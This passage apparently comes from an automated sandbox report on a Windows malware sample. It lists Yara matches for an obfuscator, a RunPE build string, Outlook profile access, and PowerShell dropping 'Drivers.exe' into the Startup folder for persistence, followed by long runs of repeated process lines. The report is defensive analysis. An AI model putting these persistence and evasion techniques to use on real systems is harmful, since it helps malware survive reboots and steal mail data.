                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: NKPhba0VZI.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: NKPhba0VZI.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: RunPE.pdb source: NKPhba0VZI.exe, 00000001.00000002.209196388.0000000003051000.00000004.00000001.sdmp, Drivers.exe, 0000000A.00000002.296374394.0000000002B68000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Yara detected Beds ObfuscatorShow sources
                      Source: Yara matchFile source: 0000000A.00000002.301353554.0000000005100000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.296957145.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.213095995.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.209833769.0000000004059000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: NKPhba0VZI.exe PID: 6112, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Drivers.exe PID: 6520, type: MEMORY
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.56b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.5100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.4125d70.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3b9f940.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.3c05d70.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.56b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.Drivers.exe.5100000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.NKPhba0VZI.exe.40bf940.4.raw.unpack, type: UNPACKEDPE
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 1_2_00D3960F push es; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_075469E0 push es; ret
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_0086960F push es; retf
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D0E472 push 8BFFFFFFh; retf
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeCode function: 5_2_00D17A37 push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 10_2_0074960F push es; retf
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_04C612A1 push es; ret
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeCode function: 20_2_009D960F push es; retf
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.99096434579
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.99096434579
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the startup folderShow sources
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exe\:Zone.Identifier:$DATAJump to behavior
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\NKPhba0VZI.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Drivers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
